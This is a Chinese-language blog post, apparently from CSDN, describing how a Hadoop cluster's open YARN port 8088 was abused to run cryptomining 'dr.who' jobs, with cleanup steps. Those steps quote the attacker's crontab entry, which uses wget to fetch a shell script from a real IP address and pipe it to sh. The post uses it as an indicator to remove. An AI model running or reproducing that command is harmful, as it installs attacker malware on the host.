yarn一直自动生成用户为dr.who的application

最新推荐文章于 2023-01-31 15:49:10 发布
最新推荐文章于 2023-01-31 15:49:10 发布
阅读量3k 收藏 1
点赞数
分类专栏: 大数据 文章标签: yarn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43300503/article/details/88073794
版权

之前用三台云服务器搭建完集群后发现任务运行的特别慢 yarn:8088页面后发现有很多奇怪的任务在跑

而且这些任务怎么都完不成还一直在生成,查看各种log日志怎么也没有exception。

在这里插入图片描述后来看了https://www.cnblogs.com/daxiangfei/p/9198856.html 才发现原来是被攻击了。
查看进程发现cup占用异常的高应该是黑客用机器去挖矿了。。。。。
解决方法:
1、删除异常进程
首先使用top 命令 查看当前进程 找到cpu占用异常多的进程记下它的PID(按q退出top状态)
然后使用sudo kill (PID号)结束该进程。
2、删除异常文件
检查/tmp和/var/tmp目录,删除java、ppc、w.conf等异常文件
3、检查定时任务
通过crontab -l 查看 是否有一个* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1任务
通过crontab -e 删除该任务(具体操作和vi编辑器相同)
4、删除异常yarn任务
排查YARN日志,确认异常的application,kill掉相应进程,可以通过8088窗口点击任务后点击右上角kill Application删除
再通过top验证看是否还有高cpu进程,如果有,kill掉,没有的话应该正常了。

黑客可能是通过8088的web界面进行注入攻击的,之前我为了方便集群配置开放了所有端口看来这样危险很大,之后配置的时候要注意端口安全的问题。

77ai宝贝
关注
专栏目录
CDH6.3.2解决yarn historyServer页面为空,登录用户为Logged in as: dr.who的问题
nhm_lxy的专栏
04-12 330
Logged in as: dr.who,yarn,jobHistory,CDH6.3.2
[Spark基础]-- spark submmit大会(2017年6月5日 - 7日)
欢迎来到我的博客,一起探索代码里的世界!
05-03 3461
Spark Summit(2017年6月5日 - 7日,旧金山)议程发布   1、官方:http://spark.apache.org/news/spark-summit-june-2017-agenda-posted.html 2、议程:https://spark-summit.org/2017/schedule/ 3、报名:https://prevalentdesignevents.c...
日常问题系列——yarn web ui提供kill application功能;登录用户为dr.who,无法查看application运行情况
njuptcyd的博客
05-10 4145
问题一、yarn web ui界面没有办法查看application具体运行情况 Yarn Web UI界面效果如下: 点击一个running 状态的application,会显示如下信息: You (User dr.who) are not authorized to view application application_1557385812521_0002 原因及解决方法 dr.who...
[Ambari] Yarn User [dr.who] is not authorized to view the logs for application
张伯毅的专栏
03-11 1007
原因 Resource Manager UI的默认用户dr.who权限不正确 解决 如果集群使用Ambari管理的话,在HDFS > Configurations > Custom core-site > Add Property hadoop.http.staticuser.user=yarn ...
YARN
xyh1re的博客
08-18 1273
YARN通过两类长期运行的守护进程提供核心服务:管理集群上资源使用的资源管理器resource manager(RM),能够启动和监控容器(container)的节点管理器node manager(NM),container用于执行特定的应用程序进程。与HDFS一样,YARN也是master/slave结构,一个RM管理着多个NM。 YARN应用运行机制 1)client首先联系RM,要求它运...
Hadoop基础之《(8)—yarn dr.who用户漏洞被挖矿》
csj50的专栏
01-31 880
dr.who用户执行了很多application,服务器被挖矿。因为yarn的8088端口REST API没有做权限控制,允许任意用户通过API创建任务。5、服务器上在/var/tmp/下就写入了11112222_test_11112222文件。1、检查/tmp和/var/tmp目录,删除异常文件。2、检查crontab -l,删除可疑脚本。2、构建json文件。
Hadoop中的dr.who是什么
说文科技,做有态度的研究。
01-04 1万+
Hadoop中的dr.who是什么? 1.问题 今天在查看自己的hadoop web ui的时候,发现了如下的界面: 仔细看右上角,发现这里登陆的用户名是:dr.who,这个dr.who是谁呢?难道是别黑客入侵了?【一般不可能是黑客入侵,难道我自己的虚拟机集群都值钱?】 2.原因 下面这句话引自《Hadoop权威指南》的chapter 6 中的Setting Up the Development...
hadoop的配置选项
u011326189的专栏
12-31 1万+
为方便阅读,特在此整理: core_site.xml 引用:http://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/core-default.xml name value description hadoop.common.configuration.version 0.2
2020.12.17课堂笔记(HBase分布式环境搭建)
超可爱慕之
12-17 439
HBase分布式环境搭建 一、HBase分布式环境安装 1.1 Zookeeper正常部署启动 首先保证Zookeeper集群的正常部署,并启动: [root@hadoop102 zookeeper]$ $ZK_HOME/bin/zkServer.sh start [root@hadoop103 zookeeper]$ $ZK_HOME/bin/zkServer.sh start [root@hadoop104 zookeeper]$ $ZK_HOME/bin/zkServer.sh start 1.2
升腾威讯怎么恢复集群_集群被入侵,YARN一直跑dr.who用户application
weixin_42297675的博客
12-13 222
国庆期间也没学习,早上想着打开集群看看,弄弄东西。10月2号早上7点,一个叫dr.who的用户,通过一个yarn应用想要get-shell??失败了还好,成功了我这个集群岂不是落到了他的手中?这个web界面默认是8088端口,这个web是可以访问到集群的(不然怎么获得数据)通过web界面登录的用户是一个普通用户,但是可以获得集群的信息,这是hadoop的一个默认用户,而通过这个用户想要我集群的sh...
配置yarn平台程序运行的历史服务,日志查看功能
在路上RalapQ
10-22 2383
一,MapReduce historyserver(历史服务) 1.    历史服务器:查看已经运行完成的应用记录             修改mapred-site.xml             指定historyserver的地址,内部和外部通信端口号,如果不指定默认是本机             historyserver是一个轻量级的服务,可以部署在任意一台节点上     2....
Hadoop常见错误及解决方案、Permission denied: user=dr.who, access=WRITE, inode=“/“:summer:supergroup:drwxr-xr-x
Redamancy06的博客
08-08 5323
配置HDFS网页登录使用的静态用户、主机名称不要起hadoop hadoop000等特殊名称、DataNode和NameNode进程同时只能工作一个、执行命令不生效,粘贴Word中命令时,遇到-和长–没区分开。导致命令失效、jps发现进程已经没有,但是重新启动集群,提示进程已经开启、jps不生效原因:全局变量hadoop java没有生效。解决办法:需要source /etc/profile文件。、8088端口连接不上、防火墙没关闭、或者没有启动YARN...
yarn集群匿名用户触发任务
bigdataprimary的博客
10-13 1286
在公司的云集群中测试mr任务,总是被kill,报错:application killed by user; 在yarn集群的resourceManager查看任务有多个并不断增加的dr.who提交的任务; 问题追踪得到的是:集群被攻击,通过yarn集群的8088端口进入服务器,拉取脚本并执行(curl) 表现:yarn集群的匿名用户任务杀不干净,服务器有两个可疑进程:curl,sh,一个拉去...
Hadoop dr.who问题
Sin_Geek成长の迹
11-14 8564
背景 昨天在生产环境偶然发现,yarn的一些日志访问不了,报如下错误 User [dr.who] is not authorized to view the logs for application;然后发现hdfs管理界面有些文件目录页进不去,登录即右上角为logged in as dr.who。然后到网上查找资料。 原因 Resource Manager UI的默认用户dr.who权限不正确 ...
yarn一直在跑一个用户为dr.who的application
weixin_33738578的博客
06-19 366
现象: 访问yarn:8088页面发现一直有任务在跑如图: 用户为dr.who,问下内部使用人员,都没有任务在跑; 结论: 恭喜你,你中毒了,攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击,攻击者可以在未授权的情况下远程执行代码的安全问题进行预警 用top命令发现cpu使用了360%多,系统会很卡。 解决办法: 1,通过查看占用cpu高得进...
记一次CDH集群被下矿机
张老湿的博客
05-04 2971
今天一上线看到集群cpu跑到100%,心里也是一跳,该不会是被下矿机了吧 top一下,果不其然有个占进程占了大部分的cpu PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 23429 yarn 20 0 4121432 985.4m 39116 S 1226.7 1.5 ...
Hadoop 配置参数摘要和默认端口整理
BIT工匠
12-03 2635
core-site.xml http://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-common/core-default.xml 配置项 中文含义 英文含义 示例 官方默认值 fs.de
Hadoop2.x Permission denied: user=dr.who, access=READ_EXECUTE inode="/tmp"
热门推荐
fansy1990的专栏
03-06 1万+
在hadoop2中查看网页中的/tmp目录出现下面的错误:Permission denied: user=dr.who, access=READ_EXECUTE inode="/tmp"如果要查看hdfs://hostname:50070/tmp下面的文件,可以在hadoop2的安装目录$HADOOP_HOME运行bin/hadoop dfs chmod -R 755 /tmp,然后就可以了。分享
怎么使用yarn,删除node_modules,再使用yarn安装,生成新的yarn.lock
最新发布
03-14
使用yarn管理项目依赖非常方便,下面是使用yarn...5. 这将会根据项目中的package.json文件重新安装所有依赖,并生成新的yarn.lock文件。 完成上述步骤后,你的项目将会重新安装所有依赖,并生成新的yarn.lock文件。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值